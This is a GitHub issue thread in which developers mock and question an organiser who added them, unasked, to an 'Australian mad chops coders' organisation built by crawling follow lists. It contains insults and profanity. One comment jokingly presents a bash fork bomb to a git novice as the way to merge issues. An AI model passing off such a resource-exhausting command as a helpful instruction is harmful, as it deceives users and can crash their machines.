### ISSUE TITLE
What is this....?

### ISSUE THREAD

**Issue by Travis-Anderson83** [madChopsCoderAu/wat2#1]
![costanzapopcorn](https://user-images.githubusercontent.com/31084612/34714869-811f178e-f576-11e7-8905-f33dbce75441.gif)

**Comment by dbrain** [comment]
Take it you got invited to the org as well? I feel like it's some elaborate recruiter spam.

**Comment by nahidakbar** [comment]
=[

**Comment by Travis-Anderson83** [comment]
yeah https://www.linkedin.com/in/matt-flax-b59a334/

**Comment by camroach87** [comment]
oh hai guys I have teh mad chops and we should be friends

But seriously I feel like I'm being scammed

**Comment by Travis-Anderson83** [comment]
I like lamb chops...

**Comment by camroach87** [comment]
Lamb chops are so good. Can we merge this with #2

**Comment by Travis-Anderson83** [comment]
sure still pretty basic knowledge with git.. How do you do it..

**Comment by neerolyte** [comment]
> sure still pretty basic knowledge with git.. How do you do it..

Merging issues requires the special fish command to be defined:

`:() { :|: & }`

Then you just `: 1+2` and it'l merge

**Comment by yaakov-h** [comment]
![c3po-perverse](https://user-images.githubusercontent.com/426009/34715981-96b4fbac-f582-11e7-851b-502801099527.gif)

**Comment by logwet** [comment]
Calling it now: Pyramid scheme

**Comment by yaakov-h** [comment]
Did someone say [Pyramid Scheme](http://www.michaelburge.us/2017/11/28/write-your-next-ethereum-contract-in-pyramid-scheme.html)?

**Comment by logwet** [comment]
Another thing, @flatmax (the guy that invited me) is based in the Philippines according to his profile; and here he is, creating an _Australian_ GitHub organisation. Fishy.

**Comment by yaakov-h** [comment]
LinkedIn says Sydney, WHOIS says Leichardt, Sydney.

I'm tempted to give him a phone call...

**Comment by samwilson** [comment]
Maybe he wanted us all to meet? Bit weird though.

**Comment by yaakov-h** [comment]
@samwilson omg I finally get to meet an Avenger!

**Comment by neerolyte** [comment]
@yaakov-h So did you call him or what?

**Comment by logwet** [comment]
If you actually join the org you can access the otherwise private group chat.

> Hey all welcome,
> This is a group of Australian coders who are all following eachother.
The group list started with one respected coder and added all of the people they were following and did the same recursively ... this is the end result.
For that reason, either you are a mad chops coder or someone with mad chops thinks you are a mad chops coder ...
> Real time discussion coming soon on gitter ... but for now, lets chat here ...
Post by flatmax, who appears to be the creator.

**Comment by yaakov-h** [comment]
@neerolyte not yet...

**Comment by yaakov-h** [comment]
@neerolyte only got an intelligible voicemail. Oh well.

**Comment by MichaelZaporozhets** [comment]
Following for updates on phone calls

**Comment by yaakov-h** [comment]
aww, I got ejected from the org, presumably for creating another repo after @flatmax said in the Teams discussion that we can do whatever we want..... hypocrite!

**Comment by MichaelZaporozhets** [comment]
The irony is that this turned out to be highly entertaining end to my day. Cheers @flatmax

**Comment by flatmax** [comment]
I removed yaakov-h because it wasn't very constructive I also removed his repo "wrong way turn back" - again not very nice nor constructive.

We are a group of people who follow each other on github ... we should respect each other ...

**Comment by StephenKellyQLD** [comment]
If you invite people into a group - without an explanation - I would expect people to call me and not be upset when they did call. I would have also spoken to @yaakov-h before you kicked him out to explain why. Or ring him back at least. To me and I am presuming most people in this group - one or two phone calls does not make a stalker.

You haven't answered the question about why you invited us in here - other than we are 'mad chops coders' . Are you trying to recruit people ? Are you trying to sell something ? 

Where did you get our names from ?

**Comment by willgarcia** [comment]
Is this project actively maintained?

3 unresolved issues in an hour seems crazy to me 😂

**Comment by flatmax** [comment]
Yeah - I've never seen it in an organisation ... people running around with no idea, the issues are piling up ...

@StephenKellyQLD, to answer some of your questions : https://github.com/orgs/madChopsCoderAu/teams/general-discussion

Just for the record - if anyone feels disturbed/challenged by this autonomous organisation, please remove yourself.

**Comment by neerolyte** [comment]
@flatmax I tried to call your phone too.

Given the utter lack of clarity about what you're setting up here and your inability to write full sentences whenever anyone asks a question I thought maybe I could clear some things up on the phone with you.

It seems like you think you're trying to set up some kind of social network. I'm kinda curious where it ends up going so I'll still around for the moment (unless you boot me too ¯\\\_(ツ)_/¯) but blindly inviting a bunch of people to the org with no description highly visible anywhere was a pretty bad first move.

At this point I think if you could lay out what your actual goals here, how you plan to manage the org, etc - you may have a (extremely thin) chance of rescuing this.

However if you continue to just point people at the poorly worded half a paragraph on the [general-discussion page](/orgs/madChopsCoderAu/teams/general-discussion) this will continue to burn to the ground.

**Comment by alexhayes** [comment]
> @flatmax said
> I removed yaakov-h because I felt somewhat stalked when he tried to call my phone ...

Oh the irony

**Comment by flatmax** [comment]
yaakov-h took the steps of shutting this autonomous zone down rather then removing himself the organisation.

@neerolyte thanks for the suggestions ...

This autonomous zone is not about one person, nor one persons goals ... it is about well, whatever direction it takes, by each person in the group.

If you notice, some people are looking for work (see the projects section), perhaps others are looking for people to work for them ? This could be a place where coders find each other, without being in the grips of some corporation or startup (other the github).

The response to this is conservatively ... well why not go to seek, why not use linkedin, why not use facebook, why not join this group or that group .... 

My point is that they aren't github, they aren't places where people who focus on free software, open source software or other proprietary softwares...  congregate ... this github is ! Futher, we can do stuff here without being restricted by a corporations limitations. For example linkedin limits your ability to talk with others if you aren't premium, seek is really just a traditional recruitment infrastructure and so on ...

The question is - what do the individuals want to make happen in an autonomous zone ?

It is different for everyone.

To seek "clarity about what you're setting up here" as you put it, is very difficult, it isn't about me, it is about anyone who feels like being part of an autonomous zone.

**Comment by alexhayes** [comment]
I vote for this issue to be reopened and #5 to be closed as a duplicate.

**Comment by yrmichael** [comment]
Not sure if I was removed or what but I can't find the original discussion thread anymore.

**Comment by neerolyte** [comment]
You're right, this thread needs more 
![image](https://user-images.githubusercontent.com/1070702/34745761-aef33306-f5e5-11e7-8e00-2457847a4d49.png)
 too

**Comment by deoxxa** [comment]
Please help with our new `cats` repository. It needs more cat (or other animal) pictures desperately.

https://github.com/madChopsCoderAu/cats

**Comment by ArtS** [comment]
Что за срань? Он что, ебанутый?

**Comment by neerolyte** [comment]
Я считаю, что он побит камнями

**Comment by ArtS** [comment]
@neerolyte love your mad google translate chops!

**Comment by stragu** [comment]
The fact that @flatmax works with Linux audio is keeping me interested.

**Comment by radar** [comment]
With no clear point or ethos for this community existing, I agree with @neerolyte that this community will burn down. There is no incentive for me to contact the people here _who I already know through other "social networks"_.

It seems like just another waste of time. I give you an F for effort.

**Comment by deoxxa** [comment]
Also referred to as "f-fort".

**Comment by wyqydsyq** [comment]
Following up on this comment: https://github.com/madChopsCoderAu/wat2/issues/1#issuecomment-356279689

@flatmax can you please elaborate how / where you found our names / GH accounts?
You claim:
> The group list started with one respected coder and added all of the people they were following and did the same recursively ... this is the end result.

And yet yourself (who invited me) or anyone else in this group are not following me, or had any prior correspondence with me. Honestly more than anything this seems like an attempt to scrape GitHub for active Australian developers, likely for use in recruiting or selling our information in general.

**Comment by ArtS** [comment]
There's no way to decline the invite? Seems spammy.

**Comment by samwilson** [comment]
@flatmax can you at least say how many invitations you sent out?

**Comment by deoxxa** [comment]
THE PEOPLE WANT ANSWERS!

![](http://blogs.uww.edu/redbarnbluesky/files/2015/10/pitchfork-pic.jpg)

**Comment by Travis-Anderson83** [comment]
My inbox is getting nuked issue closed

**Comment by wyqydsyq** [comment]
@Travis-Anderson83 You can hit the "Unsubscribe" button in the right bar if you don't want notifications for this issue.

**Comment by wyqydsyq** [comment]
@flatmax can we get a response or are you just gonna keep sidestepping?

Your reluctance to be clear and honest about this only makes it appear more dodgy.

**Comment by warfuric** [comment]
What are the guidelines on tabs vs spaces?

**Comment by flatmax** [comment]
If you have a very strong sense of entitlement, then tabs with spaces too for good measure.

**Comment by samwilson** [comment]
> What are the guidelines on tabs vs spaces?

Yeah, now we're getting to the real point of this thing! :-)

**Comment by wyqydsyq** [comment]
Can we get some acceptance criteria on this issue and make sure they are satisfied before closing kthx

**Comment by neerolyte** [comment]
> What are the guidelines on tabs vs spaces?

Tabs for indentation, spaces for alignment... obviously.

**Comment by logwet** [comment]
Perhaps you could've approached this idea differently @flatmax 

People feel a little... well threatened when they are invited to a mysterious organisation with no prior solicitation. It really isn't a leap of logic to assume this is either a scam or some stalker compiling a database of all Australian programmers. A better way to go about this would perhaps be contacting all the programmers on your database *before* inviting them to the organisation. You could perhaps send out an email explaining your goal, and if people are interested then inviting them to the org. 

My point is, you should have asked people if they want in before inviting them.

**Comment by samwilson** [comment]
> you should have asked people if they want in before inviting them.

That's sort of tautological ;-) but I know what you mean!

**Comment by wyqydsyq** [comment]
Seems the true origins of this group were revealed in the private Teams chat:
![image](https://user-images.githubusercontent.com/621277/34752546-b14f2f60-f5fe-11e7-8ee6-51c126b46d9f.png)

@flatmax perhaps a better approach would have been to email us first, explaining how you found us and what your intentions for this group are, and offering to provide an invite for *those who are interested*, instead of spamming unsolicited invites (which appeared to be from a malicious spammer or a bot) and requiring us to join the org to actually find out what it's about.

Blatantly lying about where you found us (claiming it was a natural viral effect when in reality you just scraped our data from the GH API) also doesn't help

**Comment by ArtS** [comment]
@wyqydsyq you little neurotypical people must not underestimate the power of an asperger's mind! Sans the societal norms, of course.

**Comment by SomeoneWeird** [comment]
@flatmax You can promptly fuck off, thanks.

**Comment by deoxxa** [comment]
![](https://media1.tenor.com/images/618c1ccdb2b125769e1fab068a072f95/tenor.gif)

**Comment by sinakarimi** [comment]
@flatmax did you just assume my chops?

**Comment by flatmax** [comment]
Well not really ...  It kind of worked like this ...
Assumption #1 : Top followed AU coder on github would be best place to start.
That broke down when I saw windows 95
Assumption #2 : Second most followed AU coder on github only follows coders with good chops.

Hypothesis :  Our connected graph from the second most followed AU coder on github will be a group of respecting and respectful coders, all the coders they follow with have good chops.

by scientific induction :
n=1 : Who a 2nd most followed AU coder follows must have good chops
n=n+1 : Who a 2nd most followed AU coder follows must also follow coders with good chops.
and so on ... recursively until there is now one else to follow

Implementation :
Start with second most followed AU coder on github ... 
Find who they follow, 
prune for non AU people
add to the group
start again will all known members.


Conclusion :
Not all have good chops
mad chops Australian base reaction is one of fear and anger ... not respect ...
Or perhaps fear comes first then denegration ? Plus a bit of anger

**Comment by anknetau** [comment]
Is @flatmax an alias sort of like Cher or Madonna?

**Comment by ojkelly** [comment]
So lamb chops or pork chops?

**Comment by PhilipCastiglione** [comment]
There are six uses of the word chops in that post; ergo six types of chops.

The first 4 came pretty quickly, pork, lamb, veal and mutton. I struggled until I came across an online resource that suggested venison. Five. So close.

The last type of chop eluded me for seconds, maybe even minutes.

Then it hit me.

Karate chops.

**Comment by flatmax** [comment]
7, mad coder chops

**Comment by flatmax** [comment]
@joffotron you like emacs ?

**Comment by ArtS** [comment]
> mad chops Australian base reaction is one of fear and anger ... not respect for their community and the graph they belong to ...
> Or perhaps fear comes first then denegration ? Plus a bit of anger

I am not sure if your trolling or being stupid. You forcibly affiliate people to an entity they have no awareness of and you do that purely on the assumption they belong to "their community". I am not sure you realise that social graph does NOT equal community. Following someone on github does not automatically make the followee/follower friends or even acquaintances. 

Now when this failed so miserably you try to turn it around and accuse people of having no respect or whatever other qualities you assume they should exhibit for you and non-existing community.

**Comment by flatmax** [comment]
I think if you did this for a different country, the response would be completely different ...

**Comment by alexhayes** [comment]
No, don't kill it, let's do #10 first - I'm very curious!

**Comment by anknetau** [comment]
I’m from another country, AMA

**Comment by neerolyte** [comment]
@anknetau Do we look the right way up to you?

**Comment by arrayjam** [comment]
Much like we are bound by the social contract without having signed it, we are all bound into eternal autonomous servitude by our mad chops.

**Comment by flatmax** [comment]
True, I think we need a psychologist in here. It may help.

**Comment by alexhayes** [comment]
> @arrayjam said
> Much like we are bound by the social contract without having signed it, we are all bound into eternal autonomous servitude by our mad chops.

+1 for mission statement.

**Comment by flatmax** [comment]
@SomeoneWeird your "fuck off" statement is not really trolling ...
https://www.urbandictionary.com/define.php?term=Trolling
"Shouting swear words at someone doesn't count as trolling; it's just flaming, and isn't funny. Spam isn't trolling either; it pisses people off, but it's lame."

I guess there is a line where a troller just simply becomes lame ...

But I forgive you because someone thinks you got chops

**Comment by SomeoneWeird** [comment]
That wasn't trolling, I was legitimately telling you to fuck off.

**Comment by flatmax** [comment]
OK - things are becoming very lame ...

anyone ? or Should we vote on ending this organisation now ?

**Comment by warfuric** [comment]
Considering we never had any say in joining it in the first place....

**Comment by MichaelZaporozhets** [comment]
I vote for keeping it open.

**Comment by MichaelZaporozhets** [comment]
I've warmed up to this highly autonomous cesspool

**Comment by flatmax** [comment]
What do we do with lame people ? It is autonomous ... so ... technically dull ass people can be here

**Comment by SomeoneWeird** [comment]
How subjective. By everyone's response I'd almost wager that people think _you're_ the lame one.

**Comment by flatmax** [comment]
Thanks

**Comment by karlbright** [comment]
![image](https://user-images.githubusercontent.com/20490/34757254-f0f9a274-f60a-11e7-823a-77a6b05914ff.png)

**Comment by radar** [comment]
> Should we vote on ending this organisation now ?

![](https://i.imgur.com/MPbX6OD.jpg)

**Comment by karlbright** [comment]
@radar Nice chops m8

**Comment by karlbright** [comment]
![](http://cdn.newsapi.com.au/image/v1/1877d7b46b89c323777d37f9c6090688)

**Comment by radar** [comment]
mad ones you might even say

**Comment by wyqydsyq** [comment]
@flatmax
> mad chops Australian base reaction is one of fear and anger ... not respect for their community and the graph they belong to ...
> Or perhaps fear comes first then denegration ? Plus a bit of anger

Most people do not appreciate spam, whether that is in the form of unsolicited invites to GH orgs, or unsolicited emails trying to sell viagra, people react to both much the same:
> where the fuck did you get my information and why the fuck are you trying to contact me

The unsavory reaction you have received is entirely a product of how you went about with inviting people to this org, not because of the org itself or any "lack of respect" in the community. If anything your behaviour has shown a gross lack of respect of the community you claim to be doing this for.

**Comment by neerolyte** [comment]
The community seems pretty respectful and united, everyone agrees @flatmax got it wrong.

**Comment by anknetau** [comment]
@wyqydsyq +1

**Comment by flatmax** [comment]
Here we go again ...
I am crying now

**Comment by tomj** [comment]
@flatmax can you share some of your positions and codes for everyone here?

Also:
1) is this an ‘ICO’?
2) if so how do we buy it?

**Comment by flatmax** [comment]
I thought the emacs repo clone was a good start for some coding, but now I am worried about the editor repo warfare cliché

**Comment by samwilson** [comment]
Emacs is evil, everyone knows vi is the only way. :wq

**Comment by flatmax** [comment]
Looking at the repos this organisation takes interest in, it seems that emacs is more popular ... its already had 8032 commits and it has only been there for a few hours.

Seriously ... we have to help other countries get their own mad chops coders together ... it is really going to help them.

**Comment by SomeoneWeird** [comment]
We already have communities that have formed (not forcibly, like this one). There's ViewSource, and DevANZ and a bunch of others. I'd be willing to wager most people in this thread are already in at least one of them.

What's the point of sticking _only_ all the 'senior'/'mad chops' people together? That doesn't help us disseminate knowledge, and help others learn. Any community worth its weight should welcome juniors with open arms and a willingness to help teach.

**Comment by jamesy012** [comment]
Ok so I am a junior programmer, in fact just finished my programming course at the end of last year, as well as a few friends who finished with me that were invited to this organization too. 

I would like to say that yes this organization does seem pointless, like why would I put a repo on here especially one of mine, sure I might get some feedback from people shitting on it but I feel it's probably just going to be ignored by most people even annoying some...
Bigger repos like emacs or assimp seem a little weird to put here too, because we can make pull requests or create issues on the actual repo.

Either way I did learn about DevANZ through this group, even if I still can't find much info about it online. I have had a laugh from this too so it hasn't been too bad.

I could see this being a great place to find resources for australians (like info about DevANZ) and see projects other australian devs are currently doing or repos they have worked on.

(also to @flatmax no one has made a commit to the emac repo from this group, the last commit was 8 days ago)

**Comment by deoxxa** [comment]
@jamesy012 you have now been invited to devanz! Rejoice and celebrate,

**Comment by neerolyte** [comment]
Am I the only one that's noticed where the "emacs" repo was forked from?

**Comment by deoxxa** [comment]
@neerolyte I felt too sorry for @flatmax to make a point of it. He seems to have a somewhat shaky grasp on things.

**Comment by tomj** [comment]
🙋🏻‍♂️ I’d love an invite to devANZ if there’s one available 😀

**Comment by deoxxa** [comment]
@tomj done!

**Comment by flatmax** [comment]
Yeah - I have only been coding for a month or so ... my latest code keeps blowing my computer up ... I was trying to implement this :
https://en.wikipedia.org/wiki/Nuclear_computation
